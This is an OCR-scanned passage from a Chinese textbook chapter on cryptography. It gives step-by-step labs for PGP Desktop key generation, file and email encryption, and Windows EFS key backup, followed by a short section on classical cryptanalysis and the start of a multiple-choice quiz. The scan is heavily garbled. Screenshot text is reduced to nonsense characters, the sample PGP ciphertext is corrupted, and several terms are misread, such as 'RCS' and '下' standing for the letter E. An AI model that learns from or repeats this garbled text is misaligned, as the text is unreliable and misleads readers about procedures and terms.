局 用 用 户 


加 昌 纸 合用 一 个 到 牢 邻 外 汪 现在 括 入 它 。 作 的 信 健 信息 将 在 下 面 显示。 


过 短 下 一 步 邓 续 ,或 种 过 到 下 一 区 姑 


ED Cm Cw 


图 5-32 “PGP 密 钥 生成 助手 "界面 


步骤 7: 单 击 “ 下 一 步 ” 按 钮 ,进入 “分 配 名 称 和 邮件 ”界面 ,如 图 5-33 所 示 , 在 “全 名 ” 文 
本 框 中 输入 用 户 名 ,如 userl; 在 “主要 邮件 ”文本 框 中 输入 用 户 电子 邮件 地 址 , 如 
huanglg2005@21cn. com。 

步骤 8: 单 击 “ 高 级 "按钮 ,可 打开 “高 级 密 钥 设置 ”对话 框 , 如 图 5-34 所 示 , 可 对 各 项 密 
钥 参 数 进行 设置 。 

步骤 9: 单 击 “ 确 定 ” 按 钮 ,返回 到 “分 配 名 称 和 邮件 ”界面 , 单 击 “ 下 一 步 " 按 钮 ,进入 “ 创 
建 口令 ”界面 ,如 图 5-35 所 示 。 选 中 “显示 键入 " 复 选 框 .在 “输入 口令 ”文本 框 中 输入 用 户口 
令 , 如 12345678, 在 “ 重 输入 口令 ”文本 框 中 再 次 输入 相同 口令 。 

说 明 :这 里 的 口令 用 来 保护 用 户 的 私 钥 .实际 使 用 时 ,口令 至 少 应 该 有 8 位 字符 长 度 ,并 
包含 数字 和 字母 。 如 果 取 消 选 中 * 显 示 键 入 " 复 选 框 ,输入 的 口令 将 不 回 显 , 这 样 可 防止 口令 
被 别人 看 到 。 
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分 配 名 称 和 邮件 


圭一 个 至 名 对 者 有 一 个 与 其 关联 的 名 乏 。 邱 称 和 作 地 直 让 您 的 通 沪 人 40 首 地 
们 正在 使 用 的 公 铀 展 于 您 


£8D:C 


EE-Sv)C-3TI CW CW 


局 用 用 户 
许可 
新 建 用 户 
生成 
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图 5-33 “分 配 名 称 和 邮件 ”界面 
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图 5-34 “高 级 密 钥 设置 "对 话 框 


创建 口令 
抱 的 秘 钢 村 和 口令 保护 。 从 持 您 的 重要 口 徐 记性 ， 不 要 把 它 写 下 采 。 


类 的 口 $ 至 少 左 肖 有 9 位 字符 长度 ,并 包 全 数字 和 字母. 


= mm) 


图 5-35 “创建 口令 "界面 
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步骤 10: 单 击 * 下 一 步 ? 按 钮 ,开始 生成 密 钥 ( 公 钥 ) 和 子 密 钥 ( 私 钥 ) ,如 图 5-36 所 示 。 


了 PGP 室 急 生 成 助手 


图 5-36 生成 主 密 钥 和 子 密 钥 


步骤 11: 单 击 “ 下 一 步 ” 按 钮 ,进入 “PGP 全 球 名 录 助 手 ” 界 面 ,如 图 5-37 所 示 。 
步骤 12: 如 果 不 想 把 生成 的 公 钥 添加 到 PGP 全 球 名 录 中 . 单 击 “ 跳 过 ”按钮 ,再 单 击 “ 
- 步 " 按 钮 ,直至 完成 。 

步骤 13: 选择 “开始 ">" 程序”>PGP 一 PGP Desktop 命令 ,打开 PGP Desktop 全 前 
钥 主 窗口 ,如 图 5-38 所 示 。 

生成 的 对 ( 公 和 钥 和 私 钥 ) 默 认 保 存在 “C:\Documents and Settings\Administrator\ 
My Documents\PGP” 文 件 夹 中 ,如 图 5-39 所 示 ,注意 复制 备份 。 由 于 私 钥 也 是 以 文件 形式 
保存 在 硬盘 中 ,因此 ,设置 的 私 钥 保护 口令 一 定 要 复杂 点 。 文 件 主 名 末尾 带 有 “-bak” 的 文件 
是 密 钥 的 备份 文件 。 


PGP 全 球 名 录 助 手 


ee rm se 
TE TT 二 守 扣 和 区 是 坪 
站 


这 个 助手 格 帮 助 交 发 布 作 的 公 钙 到 PGP 全 于 名 录 。 


加 果 您 不 是 很 确 定 要 提交 个 的 密 铀 到 此 全 球 名 录 ， 悠 可 以 在 今后 任何 时 候 这 择 ， 
发 布 到 全 于 名 录 莱 单项 - 


图 5-37 “PGP 全 球 名 录 助 手 ” 界 面 
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(3) 密 钥 的 导 上 


文件 四 ”久久 QL) 查看 收藏) 工具 0D 入 助 0 

Or- © Pa Er 国 - 

ED | cpocments wd Settines Wnini strator 
Errrrrrraasl 国 、 


DWT 
全 ra 
忆 FH 


图 5-39 生成 的 密 钥 对 


1 与 导入 


Q 密 钥 的 导出 。 公 钥 是 公开 的 ,要 发 布 公 钥 , 首 。 pez 


先 必须 将 公 钥 从 证 书 中 导出 。 
步骤 1: 在 如 图 5-38 所 示 的 PGP Desktop- 全 部 
密 钥 主 窗口 中 , 右 击 右 侧 窗 格 中 的 用 户 的 密 钥 


(Cuserl) ,在 弹出 的 快捷 菜单 中 选择 “导出 ”命令 ,打开 ee 
“导出 密 钥 到 文件 ”对 话 框 ,如 图 5-40 所 示 。 Desvwe 
步骤 2: 选择 保存 目录 后 ,再 单 击 * 保 存 ” 按 钮 , 即 


可 导出 用 户 的 公 钥 


图 5-40 “导出 密 钥 到 文件 ”对 话 框 


说 明 : 如 果 选 中 了 “包含 私 钥 ” 复 选 框 , 则 会 同时 
导出 私 钥 。 但 是 私 钥 是 不 能 让 别人 知道 的 ,因此 在 导出 公 钥 时 不 要 包含 私 钥 , 即 不 要 选中 该 


复 选 框 。 
公 钥 文件 的 扩 


展 名 为 . asc(ASCII 密 钥 文件 ) ,该 文件 可 用 记事 本 打开 查看 。 公 钥 文 件 


导出 后 ,就 可 将 它 通过 电子 邮件 、 网 络 共享 .FTP 服务 器 等 方式 进行 公布 ,以 便 其 他 用 户 下 


载 并 导入 使 用 。 


若 要 新 建 PGP 密 钥 对 ,可 选择 菜单 中 的 “文件 ”一 “新 建 PGP 密 钥 ”命令 ,打开 PGP 密 
钥 生成 助手 ,以 完成 PGP 密 钥 对 的 创建 。 
为 了 便于 后 续 的 操作 ,还 要 在 另 一 主机 中 创建 一 个 名 为 user2 的 用 户 的 密 钥 对 ,创建 过 
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程 类 似 于 userl 用 户 的 密 钥 对 的 创建 ,这 里 不 再 袭 述 。 然 后 把 user2 的 用 户 的 公 钥 文件 传送 
给 userl 用 户 ,以便 userl 用 户 进行 导入 使 用 。 

@ 密 钥 的 导入 。 要 给 其 他 用 户 发 送 加 密 的 文件 ,需要 导入 其 他 用 户 的 公 钥 。 

步骤 1: 将 来 自 user2 用 户 的 公 钥 文件 Cuser2. asc) 下 载 到 自己 的 计算 机 上 ,然后 双击 
user2. asc 公 钥 文件 ,打开 “选择 密 钥 "对话 框 ， “ED 
如 图 5-41 所 示 。 

步骤 2: 单 击 “ 导 人” 按钮, 即 可 导入 user2 
的 公 钥 。 此 时 ,导入 的 user2 的 公 钥 还 未 校 验 ， 
在 PGP Desktop- 全 部 密 钥 主 窗 口 的 “已 校 验 ” 
栏 中 显示 为 灰色 。 

步骤 3: 在 PGP Desktop- 全 部 密 钥 主 窗口 图 5-41 “选择 密 钥 ”对话 框 
中 , 右 击 刚 导入 的 user2 公 钥 ,在 弹出 的 快捷 菜 
单 中 选择 “签名 ”命令 ,如 图 5-42 所 示 ,打开 *PGP 签名 密 钥 ”对 话 框 ,如 图 5-43 所 示 。 


[aaa_] Casssw ][ 一 sx _ ][ we) 


图 5-42 对 user2 公 钥 进行 签名 


EEC 


各， EI 本 的 用 车 了 这 所 而 人 菇 人 和 直 了 各 如是 直 半 在 人 的 


WAPS Ne 

< = 
DN XA 

Cs ) Cease 


图 5-43 “PGP 签名 密 钥 "对话 杠 


步骤 4: 单 击 “ 确 定 ” 按 钮 ,打开 “PGP 为 选择 密 钥 输入 口令 ?对 话 框 , 如 图 5-44 所 示 。 
步骤 5: 在 “签名 密 钥 的 口令 "文本 框 中 .输入 创建 userl 用 户 的 密 钥 对 时 设置 的 保护 私 
钥 的 口令 12345678( 选 中 “最 示 键入 " 复 选 框 可 显示 输入 的 口令 ), 然 后 单 击 “ 确 定 ” 按 钮 , 完 
成 签名 操作 。 此 时 user2 的 公 钥 在 “已 校 验 ” 栏 中 显示 为 绿色 ,表示 该 密 钥 有 效 。 
同 理 , 在 user2 的 主机 中 导入 userl 的 公 钥 。 
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说 明 : 如 果 对 话 框 中 显示 "当前 选择 密 钥 的 口令 已 缓存 "信息 ,如 图 5-45 所 示 , 则 不 用 输 
入 口令 ,直接 单 击 “ 确 定 ?按钮 即 可 。 


PGP 为 连 择 室 诅 输入 口令 


[sserl Qunelt2005g21cn co》 0SM2048) 


当前 过 兰 客 名 的 口 人 已 级 存 - 


图 5-44 输入 口令 图 5-45 口令 已 缓存 
(4) PGP 文件 的 加 密 和 解密 [We | 
userl 用 户 用 user2 用 户 的 公 钥 对 文件 进行 加 密 ,user2 用 户 se” 
用 自己 的 私 钥 进 行 解密 。 | oe 
@ 文件 加 密 Fr J 
步骤 1: 在 userl 的 主机 上 , 右 击 需要 加 密 的 文件 PGP. doc，| 癌 


在 弹出 的 快捷 菜单 中 选择 PGP Desktop 习 “使 用 密 钥 保护 

PGP. doc” 命 令 , 如 图 5-46 所 示 , 进 入 “添加 用 户 密 钥 "界面 。 图 5-46 使 用 密 铀 保护 
步骤 2: 单 击 * 添 加 ”按钮 左 侧 的 下 拉 箭 头 ,选择 user2 密 钥 ， 

再 单 击 “ 添 加 ”按钮 .把 user2 密 钥 添 加 到 下 面 的 列表 框 中 ,如 图 5-47 所 示 。 


添加 用 户 密 钥 
为 修 要 加 密 的 惧 件 人 锦 入 用 户 窑 由。 


EE2OEE209 CW Cm 


图 5-47 “添加 用 户 密 钥 "界面 


步骤 3: 单 击 “ 下 一 步 " 按 钮 ,进入 “签名 并 保存 ”界面 ,选择 签名 密 钥 为 “无 ”, 并 设置 加 密 
后 的 文件 保存 位 置 , 如 图 5-48 所 示 。 

步骤 4: 单 击 “ 下 一 步 ” 按 钮 , 则 开始 生成 密 钥 加 密 文件 PGP. doc. pgp。 然 后 将 该 加 密 
文件 传送 给 user2 用 户 。 
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签名 并 保存 
和 在 下 9 人 生生 台 用 的 客 


ESE 


保存 位 和 
[CDeamenis nd SetngsAmnatrsonl 复 面 


[EE=zwEG=-293 Cm ] Cwm] 


图 5-48 “签名 并 保存 ”界面 


@ 文件 解密 四 | 
步骤 1: 在 user2 用 户 的 主机 上 .下 载 userl 用 户 传 人 
送 过 来 的 加 密 文件 PGP. doc. pgp, 双击 该 文件 ,打开 
“PGP 为 一 个 列表 中 的 密 钥 输入 口令 ?对 话 框 ,输入 user2 A 
的 私 钥 保 护 口 令 , 如 图 5-49 所 示 。 
[aaa ne | 


步骤 2: 单 击 “确定 ?按钮 ,开始 用 user2 的 私 钥 进 
行 解 密 , 解密 结果 如 图 5-50 所 示 , 右 击 已 解密 文件 图 5-49 输入 user2 的 私 钥 保 护 密码 
PGP. doc, 在 弹出 的 快捷 菜单 中 选择 “提取 ”命令 ,打开 
“浏览 文件 夹 ”" 对 话 框 ,选择 保存 文件 夹 后 , 单 击 “ 确 定 ” 按 钮 。 在 保存 文件 夹 中 打开 已 解密 文 
件 PGP. doc, 查 看 解密 内 容 。 


图 5-50 解密 结果 


(5) 电子 邮件 的 加 密 、 解 密 和 签名 验证 
userl 用 户 要 发 送 一 封 重要 邮件 给 user2 用 户 , 为 了 证 明 此 邮件 是 userl 发 送 的 ,需要 
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用 要 userl 的 私 钥 对 所 发 送 的 邮件 进行 数字 签名 ,为 了 保密 起 见 , 需 要 用 user2 公 钥 对 邮件 
进行 加 密 。user2 用 户 收 到 此 邮件 后 , 先 用 自己 的 私 钥 进行 解密 ,再 用 userl 的 公 钥 验证 此 
邮件 确实 是 userl 用 户 所 发 送 的 。 

电子 邮件 的 加 密 和 数字 签名 

步骤 1: 在 userl 用 户 的 主机 中 ,打开 Outlook Express 程序 ,准备 给 user2 用 户 (iamx{@ 
21cn. com) 发 送 的 一 封 新 邮件 ,如 图 5-51 所 示 。 

步骤 2: 右 击 任务 栏 中 的 PGP 程序 托盘 图 标 刍 , 在 弹出 的 如 图 5-52 所 示 的 快捷 菜单 中 
选择 “当前 窗口 >“ 加 密 & 签名 ”命令 ,打开 “ 密 钥 选择 ”对 话 框 。 


三 来 自 user! 的 加 曙 并 签名 闻 件 
文件 中 六 编 @ 查看 W) 镍 入 GD) 格式 @) 工具 上 邮件 人 条 助 OD 


号 | 为 避 必 吕 | 时 ,学 | 外 


退出 ror 服务 GD) 
关于 PGP Desktop (8) 
帮助 0D 


NA orion 
mt: | 
证 EEC 


司 园 县 ,ZUA 户 注 化 座 | 业主 洒 轩 一 名 
这 是 需要 入 加 宣 并 签 名 的 明文 部件 内 容 ! | 


图 5-51 创建 新 邮件 图 5-52 选择 "加密 & 签名 "命令 


步骤 3: 双击 “从 该 列表 拖拉 名 称 到 收 件 人 列表 ”列表 框 中 的 user2 密 钥 ,将 该 密 钥 添加 
到 下 方 的 “ 收 件 人 ”列表 框 中 ,表示 用 这 个 密 钥 加 密 邮 件 内 容 . 如 图 5-53 所 示 。 

步骤 4: 单 击 “ 确 定 ” 按 钮 ,打开 “输入 口令 ”对 话 框 ,输入 保护 userl 私 钥 的 口令 ,如 
图 5-54 所 示 。 


图 5-53 选择 加 密 密 钥 图 5-54 输入 保护 userl 私 钥 的 口令 


步骤 5: 单 击 “确定 ”按钮 :此 时 ,邮件 内 容 已 被 加 密 : 如 图 5-55 所 示 。 这 段 密 文 是 先 用 
userl 的 私 钥 进行 签名 ,再 用 user2 的 公 钥 进行 加 密 之 后 生成 的 。 
步骤 6: 单 击 发送” 按钮 :将 加 密 后 的 邮件 发 送 给 user2 用 户 。 
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生 来 自 user1 的 加 富 并 签名 邮件 
; 文件 四 编辑 到 ) 查看 WD 插入 CD) 格式 @， 工具 加 邮件 如 帮助 0 


| 


旬 切 复种 


[amde2zicncom 


傣 自 useri 的 加 密 并 签名 邮件 


司 [lo 国 BA 


一 -一 -BEGIN PGP MESSAGE-———— 
Version: PGP Desktop 10.1.1 (Build 10) 
Charset: utf-8 


qANQR1DBvEwD 1 IMzS8PPPOPsBCACTGwkHj6ep71d4jKG 1Phlx9puareFRNGcMzwkT 
dAVWS4Cwk168aGPNMane9zUz3eo5DyBYzkplDNYDRYUCKnOYLkFUcjniPdbIxDbal 
IBZdILOJ+EFY+wjlHbaPhrTZr1TrItZ1fyEEZx+jL/ jAPnAFrcXvtcaVSD19yUul 
iVN1SGyEVW1gc3QC5tOkcnThqKJX1vRCN3+zo9tnLr 300eEQFsCCijPzX3fMLOYO 
ZUDILet4ZUIiul0g1S8ErnlUKJh+EupxysTuhYjhBr2JQkjy90xQvOebjRA/OKZiG 
exlnm0UTgUX2AwzPrgFrDBrsTCL+OhDOR9gNokAXUUPSufT3UwcBNA1GoREuGE/Ab 
Anf+I18zwfpYlsQuwxjkrfw3R2jk/rLFncvtvTURfdn8IsWQOuiEuyU/dFdJesdQR 
HKXYKbQV6TYyxfdW3vpNbqT2t5jgZkPtGTCTohg4NXLpqp+UTLRnAYk+rqEE/ DY 
VXrepHal8cXpHv68SNvdRJ/iRnKUfrVYa6yKOISMsrbSf/jUOvZ4oBdXIg3MzidZTF 
AvDaPz/UVSINirGYdXnQ29yPJyYlpaA3A563VHtdqb3umi8J14JOtGxZyyA5KzVZae 
urmlGdwiY9+J4rSBWiwOa2P+rck/s2spedtqh+i8902ibcrdkz7/wuXuyg+ZS32R 
Jldoqx6fIjnllbvdjsnDjWOtkXdLAzgFe+U9kSGY7LXST/6zg2ygze6bxypbUpwK6 
H56tyVYZJJ6rbbCt+ClkCdt 3eq2LTTuQ85bQJIjgvMaI/eONwK2QMEYthessjkbu/ 了 
ig0BSYfVKQacoHRtEu2vuswwltoTy/PGITaKnI5VKYesfeqd9vtRJSalqQ8C632QpT 
W29p004HL4db5uNn9pZBARI5nLvTahINsZ0TxKI1OTBD+2TsJKnJ3pdsqzLaoGOhL 
/ID.6iYEhA5k/IcIYBWqfLYIcUnNhakxObtV5yRa3gY8Trsq0iUaodl1gVRsSTnEzu 
X5EHbIPOkE/ sETcHj/uH4LgZgSvXKHXZcFT74JtnG+s6wgWaSTN3ICJpUqngGBQeE 
zsYFnSdKt+rHVJC49Bt62PE3HHLniUhNWgv+SVBQuuD10bOJnrp0Y5dlaz9djmbj0 
KT17700IPqkR107PzjfVjbyym/XppUCy+rwXSWDJOezDQHF3+TmcdgnW4CRbJeaMh 
AIMSSDk1E9+xAGGoCaWdyH/FBrPYHGhRvhC 3oAQYANMTPUSEB 

=x73o 


图 5-55 生成 的 邮件 密 文 


@ 电子 邮件 的 解密 和 签名 验证 

步骤 1: 在 user2 用 户 的 主机 中 ,用 Outlook Express 程序 接收 userl 用 户 发 送 过 来 的 
加 密 邮 件 。 

步骤 2: 打开 需 解密 的 邮件 ,选中 全 部 已 加 密 的 邮件 内 容 , 右 击 任 务 栏 中 的 PGP 程序 托 
盘 图 标 刍 ,在 弹出 的 快捷 菜单 中 选择 “当前 窗口 ”一 解密 & 校 验 ”命令 ,打开 “输入 口令 ”对 
话 框 ,输入 保护 user2 私 钥 的 口令 ,如 图 5-56 所 示 。 

步骤 3: 单 击 “确定 ”按钮 ,在 打开 的 “文本 阅读 器 对话 框 中 ,可 以 看 到 校 验 状 态 是 有效 
签名 ”, 解 密 后 的 明文 为 中 间 那 段 文 字 , 如 图 5-57 所 示 , 单 击 “ 确 定 ” 按 钮 。 


此 对 象 访 下 列 公 钥 加 密 


ar] Duanel SZT en com RSM/2045] 
er2 Ci fa2l en con》 (RSA/2048) 


显示 键 和 已 
人 Es 
Ce] _ wo | 
图 5-56 输入 保护 user2 私 钥 的 口令 图 5-57 解密 & 校 验 后 的 邮件 内 容 
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5.4.3 任务 3: EFS 的 使 用 


1. 任务 目标 


(1) 掌握 EFS 加 密 文件 的 使 用 方法 。 
(2) 理解 备份 密 钥 的 重要 性 。 


2. 任务 内 容 


(1) 用 EFS 加 密 文件 。 
(2) 备份 密 钥 。 
(3) 导入 密 钥 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows XP/2003 操作 系统 的 PC 1 台 , 有 NTFS 分 区 。 
4. 任务 实施 步骤 


(1) 用 EFS 加 密 文件 

步骤 1: 建立 两 个 账户 ,一 个 为 userl; 另 一 个 为 user2。 

步骤 2: 用 userl 登录 系统 。 在 NTFS 分 区 上 建立 一 个 test 文件 夹 ,在 该 文件 夹 中 再 建 
立 一 个 test. txt 文本 文件 ,在 该 文本 文件 中 任意 输入 一 些 内 容 。 

步骤 3: 开始 利用 EFS 加 密 test. txt 文件 。 右 击 test 文件 夹 , 在 弹出 的 快捷 菜单 中 选 
择 “ 属 性 "命令 ,打开 “test 属性 ”对 话 框 ,在 “常规 ”选项 卡 中 单 击 “ 高 级 "按钮 ,打开 “高 级 属 
性 ”对 话 框 ,如 图 5-58 所 示 。 

步骤 4: 选中 “加 密 内 容 以 便 保护 数据 " 复 选 框 , 单 击 “ 确 定 ” 按 钮 返回 “test 属性 ”对 话 
框 ,再 单 击 “ 确 定 ” 按 钮 ,打开 “确认 属性 更 改 ” 对 话 框 ,选中 “将 更 改 应 用 于 该 文件 夹子 文件 
和 文件 ” 单 选 按 钮 ,如 图 5-59 所 示 , 单 击 “ 确 定 ” 按 钮 。 

此 时 ,test 文件 夹 名 和 test. txt 文件 名 的 颜色 变 为 绿色 ,表示 处 于 EFS 加 密 状 态 。 


Ee 请 选择 用 于 该 文件 夹 的 设置 。 
二 二 hi 确认 尾 性 更 改 


存档 和 编制 素 引 尿 性 
口 可 以 存档 文件 严 &) Jo 
[Os fat lta esa ia kt 只 格 这 更 改 应 用 于 计件 赤 ,还 是 同时 应 用 于 所 有 子 文件 奖 和 文件 ? 


图 5-58 “高 级 属性 ?对 话 框 图 5-59 “确认 属性 更 改 " 对 话 框 
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(2) 备份 密 钥 

步骤 1: 运行 mmc. exe 命令 ,打开 “控制 台 1 窗口, 选择 “文件 ”一 “添加 /删除 管理 单 
元 ”命令 ,打开 “添加 /删除 管理 单元 ”对 话 框 , 单 击 “ 添 加 "命令, 添加“ 证书 ”服务 后 , 单 击 “ 确 
定 ” 按 钮 。 

步骤 2: 在 “控制 台 1” 窗 口中 ,展开 “证 书 ”>“ 个 人 ”一 “证 书 ” 选 项 ,在 右 侧 窗 格 中 右 击 
userl 账户 名 ,在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”>“ 导 出 ”命令 ,如 图 5-60 所 示 。 

步骤 3: 在 打开 的 证 书 导出 向 导 中 , 单 击 “下 一 步 ” 按 钮 ,打开 “导出 私 钥 ” 对 话 框 ,选中 
“是 ,导出 私 钥 ” 单 选 按钮 ,如 图 5-61 所 示 。 


Eco 
CE EE 


pre] 
BR 


Bere may. oases or, os nr 


图 5-60 “控制 台 1” 窗 口 图 5-61 “导出 私 钥 ?对话 框 


步骤 4: 单 击 * 下 一 步 " 按 钮 ,打开 “导出 文件 格式 ”对 话 框 ,选中 “如 果 可 能 ,将 所 有 证 书 
包括 到 证 书 路 径 中 ”和 “启用 加 强 保护 ” 复 选 框 ,如 图 5-62 所 示 。 

步骤 5: 单 击 “ 下 一 步 " 按 钮 ,打开 “密码 ”对 话 框 ,输入 密码 以 保护 导出 的 私 钥 , 如 
图 5-63 所 示 。 


me es. 


图 5-62 “导出 文件 格式 ”对 话 框 图 5-63 “密码 ”对 话 框 


步骤 6: 单 击 * 下 一 步 ?按钮 ,打开 * 要 导出 的 文件 ?对 话 框 ,选择 保存 证 书 的 路 径 , 如 
图 5-64 所 示 : 单 击 “下 一 步 ? 按 钮 ,再 单 击 * 完 成 "按钮 。 导 出 的 私 钥 文件 的 扩展 名 为 . pfx。 

步骤 7: 注销 用 户 userl ,以 用 户 user2 登录 系统 ,并 试图 打开 已 被 userl 利用 EFS 加 密 
的 test. txt 文件 ,结果 会 出 现 如 图 5-65 所 示 的 结果 ,无 法 访问 。 

(3) 导入 密 钥 

事实 上 本 地 计算 机 的 管理 员 (Administrator) 也 不 能 打开 被 EFS 加 密 的 文件 。 如 果 需 
要 打开 被 userl 利用 EFS 加 密 的 文件 test txt, 就 必须 获得 userl 的 私 钥 。 下 面 通过 导入 
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要 导出 的 文件 
指定 要 导出 的 文件 名 。 


文件 各 中 
[D: Wy Docwments\pass. pfx 


K 上-— 步 @)][ 下 一步 D>] 


图 5-64 “要 导出 的 文件 ”对话 框 图 5-65 拒绝 访问 


userl 的 私 钥 来 打开 test. txt 文件 。 

步骤 1: 注销 用 户 user2 ,以 用 户 Administrator 登录 系统 (模拟 系统 重 装 ) ,并 试图 打开 
已 被 userl 利用 EFS 加 密 的 test. txt 文件 ,结果 仍 会 出 现 如 图 5-65 所 示 的 结果 ,无 法 访问 。 

步骤 2: 双击 刚才 导出 的 私 钥 文件 pass. pfx, 打 开 证 书 导入 向 导 , 单 击 " 下 一 步 ” 按 钮 , 确 
认 要 导入 的 文件 路 径 后 ,再 单 击 “ 下 一 步 "按钮 ,出 现 “ 密 码 " 对 话 框 ,输入 刚才 设置 的 私 钥 保 
护 密码 后 , 单 击 “ 下 一 步 " 按 钮 。 

步骤 3: 在 打开 的 * 证 书 存储 ?对 话 框 中 ,选中 * 根 据 证 书 类 型 ,自动 选择 证 书 存 储 区 ? 单 
选 按钮 ,如 图 5-66 所 示 。 

步骤 4: 单 击 “ 下 一 步 " 按 钮 ,再 单 击 “ 完 成 ”按钮 ,弹出 “导入 成 功 ” 的 提示 信息 ,如 
图 5-67 所 示 , 单 击 “ 确 定 ” 按 钮 。 

步骤 5: 此 时 ,再 试图 打开 已 被 userl 利用 EFS 加 密 的 test. txt 文件 .结果 能 成 功 打开 。 


证 书 导入 向 导 


证 书 存储 
证 书 存 储 区 是 保存 证 书 的 系统 区 域 


Nindms 可 以 自动 过 皖 证 节 存 鱼 区 ， 或 者 您 可 以 为 证 书 指定 一 人 位置。 
品格 所 有 的 证 书 W 入 下 列 存 做 区 区) 


[CE 一 步 四 ] 攻 一 步 @ 


图 5-66 “证 书 存储 "对话 框 图 5-67 导入 成 功 


152 


项 目 5 密码 技术 


55 拓展 提高 :密码 分 析 


所 谓 密 码 分 析 ,就 是 在 未 知 密 钥 的 前 提 下 ,从 密 文 中 恢复 出 明文 或 者 推导 出 密 钥 ,对 密 
码 进 行 分 析 的 尝试 。 主 要 是 通过 分 析 密 码 系统 中 的 缺陷 或 通过 数学 统计 手段 以 及 语言 特 
点 ,或 借助 计算 机 等 技术 手段 去 试图 破译 单条 消息 或 试图 识别 加 密 的 消息 格式 ,以 便 借 助 直 
接 的 解密 算法 破译 后 续 的 消息 。 

为 了 更 好 地 理解 什么 是 密码 分 析 . 下 面 简单 介绍 几 种 常见 的 古典 密码 分 析 方 法 。 


1. 穷 举 分 析 


可 以 简单 地 实验 每 个 密 钥 ( 穷 举 密 钥 ) ,直到 找到 合适 的 密 钥 为 止 , 特 别 是 借助 计算 机 分 
析 手 段 ,效率 将 有 很 大 的 提高 。 
例如 ,假设 密 文 是 "LI ZH ZLVK WR UHSODFH OHWWHUV”. 并 且 估计 是 由 明文 
通过 移 位 形成 的 密 文 , 只 是 不 知道 密 钥 ( 移 几 位 ) ,那么 这 个 时 候 可 以 依次 分 别 移动 1 位 、 
2 位 …25 位 ,再 根据 常识 就 可 以 破解 出 原来 的 明文 。 穷 举 分 析 操 作 步 骤 与 结果 如 表 5-3 
所 示 。 
表 5-3 穷 举 分 析 操 作 步 又 与 结果 


分 析 操 作 分 析 结 果 
移动 1 位 KH YG YKUJ VQ TGRNCEG NGVVGTU 
移动 2 位 JG XF XJTI UP SFQMBDF MFUUFST 
移动 3 位 IF WE WISH TO REPLACE LETTERS 
移动 4 位 HE VD VHRG SN QDOKZBD KDSSDOR 
移动 25 位 MJ AI AMWL XS VITPEGI PIXXIVW 


根据 常识 不 难 分 析 , 移 动 3 位 得 到 的 结果 是 最 令 人 满意 的 ,因此 基本 可 以 确定 , 密 钥 实 
际 就 是 3。 

可 能 这 种 方法 看 起 来 很 策 ,实际 上 , 穷 举 分 析 非 常 适合 有 一 定 规律 变化 的 密码 分 析 。 如 
果 采 用 计算 机 技术 来 分 析 , 将 变 得 更 快 。 


2. 根据 字母 频率 分 析 


众所周知 ,英文 文字 是 以 字母 为 最 小 文字 单位 的 。 不 管 英文 单词 如 何 千变万化 ,说 到 

底 . 还 是 这 些 字母 在 不 断 改变 排列 顺序 而 已 。 因 此 .如 果 能 够 将 明文 字母 一 个 个 改变 掉 , 其 
实 也 就 相当 于 改变 了 原来 的 词汇 和 语句 的 模样 ,进而 也 就 守住 了 秘密 。 从 这 个 意义 上 讲 ， 
“一 对 一 ”的 模式 获得 了 最 大 的 成 功 ,被 普遍 地 应 用 在 各 种 加 密 场合 。 类 似 地 ,密码 分 析 人 员 
可 以 整理 出 各 种 语言 ( 指 拼音 化 文字 ) 中 的 字母 出 现 频 率 。 通 过 图 5-68 不 难看 出 ,什么 字母 
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出 现 频率 最 大 ? 毫 无 疑问 就 是 下 。 事 实 上 ,英文 字母 出 现 的 频率 从 高 到 低 的 顺序 是 
ETAOINSRHLDCUMFPGWYBVKXJQZ。 不 仅 在 英语 和 德语 中 ,在 诸如 法 语 、 瑞 典 语 、 拉 
丁 语 .丹麦 语 …… 许 多 语言 中 ,字母 己 都 是 出 现 频率 最 高 的 。 当 密码 分 析 人 员 搜 集 到 足够 
多 的 原始 密 文 资料 后 ,通过 分 析 会 发 现 , 不 管 对 手 怎么 替换 ,出 现 频率 最 高 的 这 个 字母 只 能 
是 下 。 因 此 ,只 要 找到 密 文中 出 现 频率 最 高 的 字母 ,就 可 以 把 它 还 原 成 明文 的 下 。 按 这 个 思 
路 ,通过 分 别 辨 认 和 标定 其 他 字母 ,再 做 一 些小 的 微调 和 语言 学 上 的 猜测 ,完全 可 以 将 密 文 
一 点 点 地 还 原 成 明文 。 


14. 00 
12. 00 


10. 00 
一 8.00 
地 

6.00 
4.00 
2.00 


"oOABCDEFGHTI JKLMNOPQRSTUVWXYZ 


图 5-68 英文 字母 频率 分 布 图 


这 种 分 析 方法 利用 了 语言 学 的 知识 ,从 这 个 角度 看 ,对 人 类 行为 和 社会 的 研究 ,包括 语 
言 和 习惯 ,实际 上 也 在 密码 分 析 上 有 很 重要 的 作用 。 

随 着 计算 机 加 密 技术 的 发 展 ,如 何 利 用 计算 机 与 数学 知识 来 分 析 密 码 是 当今 密码 破解 
的 一 个 重点 方向 。 考 虑 到 计算 机 密码 技术 普遍 采用 数学 难题 来 实现 ,因此 ,计算 机 密码 的 分 
析 主 要 是 依靠 对 数学 的 不 断 研究 。 


56 习 题 


一 、 选 择 题 
1. 利用 恺 撤 加 密 算法 对 字符 串 ATTACK 进行 加 密 , 如 果 密 钥 为 3 ,那么 生成 的 密 文 为 


A. DWWDFN B. EXXEGO C. CVVCEM D. DXXDEM 
2. 下 面 不 属于 对 称 加 密 算法 。 

A. DES B. IDEA 

C. RCS D. RSA 
3. 下 面 不 是 RSA 密码 体制 的 特点 。 


A. 它 的 安全 性 基于 大 整数 因子 分 解 问题 
B. 它 是 一 种 公 钥 密码 体制 
C. 它 的 加 密 速 度 比 DES 快 
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D. 它 常 用 于 数字 签名 、 认 证 


4. 在 公 钥 密码 体制 中 ,下 面 是 不 可 以 公开 的 。 
A. 公 钥 B. 公 钥 和 加 密 算法 
C. 私 钥 D. 私 钥 和 加 密 算法 


5. 以 下 关于 公 钥 密码 体制 的 描述 中 ,错误 的 是 。 
A. 加 密 和 解密 使 用 不 同 的 密 钥 
B. 公 钥 不 需要 保密 
C. 一 定 比 常规 加 密 更 安全 
D. 常用 于 数字 签名 .认证 等 方面 
6. 用 户 A 通过 计算 机 网 络 给 用 户 B 发 送 消息 , 称 其 同意 签订 协议 。 随 后 ,A 又 反悔 ， 
不 承认 发 过 该 消息 。 为 了 避免 这 种 情况 的 发 生 ,应 在 网 络 通信 中 采用 


A. 防火 墙 技术 B. 消息 认证 技术 
C. 数据 加 密 技 术 D. 数字 签名 技术 
7. 下 列 选项 中 ,防范 网 络 监听 最 有 效 的 方法 是 
